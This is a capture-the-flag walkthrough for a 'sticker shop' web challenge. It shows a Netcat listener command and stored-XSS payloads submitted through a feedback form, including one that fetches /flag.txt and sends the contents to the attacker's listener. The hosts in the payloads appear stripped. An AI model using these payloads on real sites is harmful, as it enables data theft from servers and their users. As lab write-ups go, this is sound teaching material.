In this challenge, we are tasked with retrieving a flag from a web server hosted by a local sticker shop. The scenario highlights poor security practices, as the server is hosted on the same machine used for everyday activities like browsing the internet and checking customer feedback. This setup exposes the server to various potential vulnerabilities. The goal is to identify and exploit these weaknesses to access the flag located at
. This write up details the systematic approach used to uncover and exploit the vulnerability to achieve the objective.

Let’s visit
. At first glance, the page doesn’t seem to have anything particularly interesting. However, it does feature a "Feedback" tab. Let’s explore it further to see if it reveals any useful information or functionality.

Now, let’s start a Netcat listener on the attacker’s machine by running the following command:
nc -knvlp 8080
This will set up a listener on port 8080
to capture any incoming connections.
Next, we’ll test for potential Cross-Site Scripting (XSS) vulnerabilities by sending the following payload through the “Feedback” form or any input field that allows HTML:
<img src=x onerror="fetch('')"/>
This payload attempts to trigger an HTTP request to the attacker’s IP (
) when the error occurs in the image tag.
After submitting the payload, monitor the Netcat listener for any incoming connections. If the XSS vulnerability is present and executed, you should see a connection on your listener from the vulnerable web server, indicating that the payload was triggered successfully.

Now that we have discovered the XSS vulnerability, let’s craft a payload that will visit /flag.txt
and send its contents to our listener server. The following payload is designed to do just that:
<img src="x" onerror="fetch('').then(r => r.text()).then(r => fetch('' + r)).catch(e => fetch('' + e))"/>
- The payload first attempts to fetch the contents of
, where the flag is likely stored. - It then sends the contents (or any error) to the attacker’s server at
, appending the response as a query parameter (?c=<response>
). - This ensures that, if the
request is successful, the contents of theflag.txt
file will be exfiltrated to our server.
After submitting this payload, monitor your listener server for any incoming connections containing the flag.

We successfully captured the flag by crafting an XSS payload that fetched the contents of /flag.txt
from the vulnerable server and exfiltrated it to our listener server at
. The payload triggered the request, and we received the flag in our listener as expected
Thank you for reading this walk-through! I hope it was helpful and informative. ❤️